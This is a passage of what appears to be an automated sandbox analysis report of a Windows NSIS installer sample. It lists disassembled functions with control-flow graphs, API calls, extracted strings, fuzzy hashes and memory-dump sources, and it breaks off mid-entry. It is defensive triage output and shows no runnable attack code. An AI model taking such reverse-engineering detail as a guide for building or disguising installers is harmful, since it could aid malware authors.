                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3282139019-0
                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                      Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                      • API String ID: 608394941-2746725676
                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                      Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,%ReadyAdvised%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,%ReadyAdvised%,%ReadyAdvised%,00000000,00000000,%ReadyAdvised%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                      • String ID: %ReadyAdvised%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                      • API String ID: 4286501637-4266961853
                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                      Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00427979,00403792,00000000), ref: 004034FF
                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                      • String ID: (]C$... %d%%$pAB$y9B$yyB
                                                                                                      • API String ID: 651206458-2355651534
                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                      Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                      Strings
                                                                                                      • soft, xrefs: 004036A1
                                                                                                      • Null, xrefs: 004036AA
                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                      • Inst, xrefs: 00403698
                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                      • API String ID: 4283519449-527102705
                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                      Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2740478559-0
                                                                                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                      Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                      • GlobalFree.KERNELBASE(00781400), ref: 00402387
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                      • String ID: %ReadyAdvised%$Exch: stack < %d elements$Pop: stack empty
                                                                                                      • API String ID: 1459762280-2750020891
                                                                                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                      Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                      APIs
                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                      • GlobalFree.KERNELBASE(00781400), ref: 00402387
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                      • String ID:
